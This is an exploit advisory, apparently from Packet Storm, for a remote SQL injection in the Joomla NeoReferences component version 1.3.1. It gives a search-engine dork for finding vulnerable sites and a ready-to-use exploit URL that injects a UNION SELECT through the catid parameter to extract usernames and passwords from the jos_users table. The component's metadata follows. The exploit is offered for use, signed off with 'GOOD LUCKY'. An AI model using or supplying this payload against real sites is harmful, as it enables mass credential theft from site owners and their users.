The Joomla com_neoreferences component version 1.3.1 suffers from a remote SQL injection vulnerability.
ad7de9626d86f2716ef20890b10b03375d083f2fb5687243609d50e6e1a03040#########################################################################
#
# joomla SQL Injection(com_neoreferences)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#########################################################################
#
# DorKs 1 : allinurl: "com_neoreferences"
#
########################################################################
EXPLOIT :
index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*
#########################################################################
# S@BUN www.hackturkiye.com S@BUN
#########################################################################
# S@BUN GOOD LUCKY S@BUN
#########################################################################
added notes:
<name>NeoReferences</name>
<creationDate>December 2006</creationDate>
<author>NeoJoomla</author>
<license>Released under CREATIVE COMMONS License</license>
<copyright>Copyright (C) 2006 Neoweb</copyright>
<authorEmail>support@neojoomla.com</authorEmail>
<authorUrl>www.neojoomla.com</authorUrl>
<version>1.3.1</version>
<description><![CDATA[NeoReferences is component which enables you to manage your current and future references by category and thanks to a system of thumbnails clear and very visual!
You can add an image for each reference which will be resized by the component, just click on it to see the complete view.<br />Developped by NeoJoomla.]]></description>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed